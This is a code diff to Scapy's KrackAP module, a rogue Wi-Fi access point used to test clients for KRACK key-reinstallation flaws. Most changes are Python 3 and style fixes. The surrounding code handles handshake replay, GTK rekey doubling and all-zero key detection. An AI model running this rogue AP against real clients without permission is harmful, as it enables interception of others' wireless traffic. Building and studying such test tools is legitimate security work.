@@ -11,17 +11,30 @@ from cryptography.hazmat.backends import default_backend
 from scapy.automaton import ATMT, Automaton
 from scapy.base_classes import Net
 from scapy.config import conf
-from scapy.compat import raw, hex_bytes, chb
-from scapy.consts import WINDOWS
-from scapy.error import log_runtime, Scapy_Exception
-from scapy.layers.dot11 import RadioTap, Dot11, Dot11AssoReq, Dot11AssoResp, \
-    Dot11Auth, Dot11Beacon, Dot11Elt, Dot11EltRates, Dot11EltRSN, \
-    Dot11ProbeReq, Dot11ProbeResp, RSNCipherSuite, AKMSuite
+from scapy.compat import raw, chb
+from scapy.consts import LINUX
+from scapy.error import log_runtime
+from scapy.layers.dot11 import (
+    AKMSuite,
+    Dot11,
+    Dot11AssoReq,
+    Dot11AssoResp,
+    Dot11Auth,
+    Dot11Beacon,
+    Dot11Elt,
+    Dot11EltDSSSet,
+    Dot11EltRSN,
+    Dot11EltRates,
+    Dot11ProbeReq,
+    Dot11ProbeResp,
+    RSNCipherSuite,
+    RadioTap,
+)
 from scapy.layers.eap import EAPOL
 from scapy.layers.l2 import ARP, LLC, SNAP, Ether
 from scapy.layers.dhcp import DHCP_am
 from scapy.packet import Raw
-from scapy.utils import hexdump
+from scapy.utils import hexdump, mac2str
 from scapy.volatile import RandBin
 
 
@@ -66,7 +79,8 @@ class KrackAP(Automaton):
 
     def __init__(self, *args, **kargs):
         kargs.setdefault("ll", conf.L2socket)
-        kargs.setdefault("monitor", True)
+        if not LINUX:
+            kargs.setdefault("monitor", True)
         super(KrackAP, self).__init__(*args, **kargs)
 
     def parse_args(self, ap_mac, ssid, passphrase,
@@ -82,27 +96,33 @@ class KrackAP(Automaton):
                    **kwargs):
         """
         Mandatory arguments:
-        @iface: interface to use (must be in monitor mode)
-        @ap_mac: AP's MAC
-        @ssid: AP's SSID
-        @passphrase: AP's Passphrase (min 8 char.)
+
+        :param iface: interface to use (must be in monitor mode)
+        :param ap_mac: AP's MAC
+        :param ssid: AP's SSID
+        :param passphrase: AP's Passphrase (min 8 char.)
 
         Optional arguments:
-        @channel: used by the interface. Default 6, autodetected on windows
+
+        :param channel: used by the interface. Default 6
 
         Krack attacks options:
 
          - Msg 3/4 handshake replay:
-        double_3handshake: double the 3/4 handshake message
-        encrypt_3handshake: encrypt the second 3/4 handshake message
-        wait_3handshake: time to wait (in sec.) before sending the second 3/4
-         - double GTK rekeying:
-        double_gtk_refresh: double the 1/2 GTK rekeying message
-        wait_gtk: time to wait (in sec.) before sending the GTK rekeying
-        arp_target_ip: Client IP to use in ARP req. (to detect attack success)
-                       If None, use a DHCP server
-        arp_source_ip: Server IP to use in ARP req. (to detect attack success)
-                       If None, use the DHCP server gateway address
+
+        :param double_3handshake: double the 3/4 handshake message
+        :param encrypt_3handshake: encrypt the second 3/4 handshake message
+        :param wait_3handshake: time to wait (in sec.) before sending the
+            second 3/4
+
+        - double GTK rekeying:
+
+        :param double_gtk_refresh: double the 1/2 GTK rekeying message
+        :param wait_gtk: time to wait (in sec.) before sending the GTK rekeying
+        :param arp_target_ip: Client IP to use in ARP req. (to detect attack
+            success). If None, use a DHCP server
+        :param arp_source_ip: Server IP to use in ARP req. (to detect attack
+            success). If None, use the DHCP server gateway address
         """
         super(KrackAP, self).parse_args(**kwargs)
 
@@ -111,13 +131,7 @@ class KrackAP(Automaton):
         self.ssid = ssid
         self.passphrase = passphrase
         if channel is None:
-            if WINDOWS:
-                try:
-                    channel = kwargs.get("iface", conf.iface).channel()
-                except (Scapy_Exception, AttributeError):
-                    channel = 6
-            else:
-                channel = 6
+            channel = 6
         self.channel = channel
 
         # Internal structures
@@ -183,8 +197,8 @@ class KrackAP(Automaton):
         pmk = self.pmk
         anonce = self.anonce
         snonce = client_nonce
-        amac = hex_bytes(self.mac.replace(":", ""))
-        smac = hex_bytes(self.client.replace(":", ""))
+        amac = mac2str(self.mac)
+        smac = mac2str(self.client)
 
         # Compute PTK
         self.ptk = customPRF512(pmk, amac, smac, anonce, snonce)
@@ -220,13 +234,14 @@ class KrackAP(Automaton):
         """Build a packet with info describing the current AP
         For beacon / proberesp use
         """
+        ts = int(time.time() * 1e6) & 0xffffffffffffffff
         return RadioTap() \
             / Dot11(addr1=dest, addr2=self.mac, addr3=self.mac) \
-            / layer_cls(timestamp=0, beacon_interval=100,
+            / layer_cls(timestamp=ts, beacon_interval=100,
                         cap='ESS+privacy') \
             / Dot11Elt(ID="SSID", info=self.ssid) \
             / Dot11EltRates(rates=[130, 132, 139, 150, 12, 18, 24, 36]) \
-            / Dot11Elt(ID="DSset", info=chb(self.channel)) \
+            / Dot11EltDSSSet(channel=self.channel) \
             / Dot11EltRSN(group_cipher_suite=RSNCipherSuite(cipher=0x2),
                           pairwise_cipher_suites=[RSNCipherSuite(cipher=0x2)],
                           akm_suites=[AKMSuite(suite=0x2)])
@@ -327,7 +342,7 @@ class KrackAP(Automaton):
             addr1=dest,
             addr2=self.mac,
             addr3=self.mac,
-            FCfield="+".join(['wep'] + additionnal_flag),
+            FCfield="+".join(['protected'] + additionnal_flag),
             SC=(next(self.seq_num) << 4),
             subtype=0,
             type="Data",
@@ -486,7 +501,7 @@ class KrackAP(Automaton):
         log_runtime.warning("Client %s connected!", self.client)
 
         # Launch DHCP Server
-        self.dhcp_server.run()
+        self.dhcp_server()
 
         rep = RadioTap()
         rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
@@ -509,7 +524,7 @@ class KrackAP(Automaton):
         temp_pkt.remove_payload()
         self.RSN = raw(temp_pkt)
         # Avoid 802.11w, etc. (deactivate RSN capabilities)
-        self.RSN = self.RSN[:-2] + "\x00\x00"
+        self.RSN = self.RSN[:-2] + b"\x00\x00"
 
         rep = RadioTap()
         rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
@@ -551,7 +566,7 @@ class KrackAP(Automaton):
         if RadioTap not in pkt:
             return
         if EAPOL in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
-           pkt[EAPOL].load[1] == "\x01":
+           pkt[EAPOL].load[1:2] == b"\x01":
             # Key MIC: set, Secure / Error / Request / Encrypted / SMK
             # message: not set
             raise self.WPA_HANDSHAKE_STEP_3_SENT().action_parameters(pkt)
@@ -568,7 +583,7 @@ class KrackAP(Automaton):
         # Data: full message with MIC place replaced by 0s
         # https://stackoverflow.com/questions/15133797/creating-wpa-message-integrity-code-mic-with-python
         client_mic = pkt[EAPOL].load[77:77 + 16]
-        client_data = raw(pkt[EAPOL]).replace(client_mic, "\x00" * len(client_mic))  # noqa: E501
+        client_data = raw(pkt[EAPOL]).replace(client_mic, b"\x00" * len(client_mic))  # noqa: E501
         assert hmac.new(self.kck, client_data, hashlib.md5).digest() == client_mic  # noqa: E501
 
         rep = RadioTap()
@@ -604,7 +619,7 @@ class KrackAP(Automaton):
         if RadioTap not in pkt:
             return
         if EAPOL in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
-           pkt[EAPOL].load[1:3] == "\x03\x09":
+           pkt[EAPOL].load[1:3] == b"\x03\x09":
             self.time_handshake_end = time.time()
             raise self.KRACK_DISPATCHER()
 
@@ -682,8 +697,8 @@ class KrackAP(Automaton):
         if pkt[Dot11].FCfield.retry:
             return
 
-        # Skip unencrypted frames (TKIP rely on WEP packet)
-        if not pkt[Dot11].FCfield.wep:
+        # Skip unencrypted frames (TKIP rely on encrypted packets)
+        if not pkt[Dot11].FCfield.protected:
             return
 
         # Dot11.type 2: Data
@@ -720,9 +735,9 @@ class KrackAP(Automaton):
 
         # Decoding with a 0's TK
         if data_clear is None:
-            data = parse_data_pkt(pkt, "\x00" * len(self.tk))
+            data = parse_data_pkt(pkt, b"\x00" * len(self.tk))
             try:
-                mic_key = "\x00" * len(self.mic_sta_to_ap)
+                mic_key = b"\x00" * len(self.mic_sta_to_ap)
                 data_clear = check_MIC_ICV(data, mic_key, pkt.addr2, pkt.addr3)
                 log_runtime.warning("Client has installed an all zero "
                                     "encryption key (TK)!!")
@@ -778,8 +793,8 @@ class KrackAP(Automaton):
         if pkt[Dot11].FCfield.retry:
             return
 
-        # Skip unencrypted frames (TKIP rely on WEP packet)
-        if not pkt[Dot11].FCfield.wep:
+        # Skip unencrypted frames (TKIP rely on encrypted packets)
+        if not pkt[Dot11].FCfield.protected:
             return
 
         # Normal decoding
@@ -795,7 +810,7 @@ class KrackAP(Automaton):
 
         pkt_clear = LLC(data_clear)
         if EAPOL in pkt_clear and pkt.addr1 == pkt.addr3 == self.mac and \
-           pkt_clear[EAPOL].load[1:3] == "\x03\x01":
+           pkt_clear[EAPOL].load[1:3] == b"\x03\x01":
             raise self.WAIT_ARP_REPLIES()
 
     @ATMT.action(get_gtk_2)
@@ -853,8 +868,8 @@ class KrackAP(Automaton):
         if pkt[Dot11].FCfield.retry:
             return
 
-        # Skip unencrypted frames (TKIP rely on WEP packet)
-        if not pkt[Dot11].FCfield.wep:
+        # Skip unencrypted frames (TKIP rely on encrypted packets)
+        if not pkt[Dot11].FCfield.protected:
             return
 
         # Dot11.type 2: Data
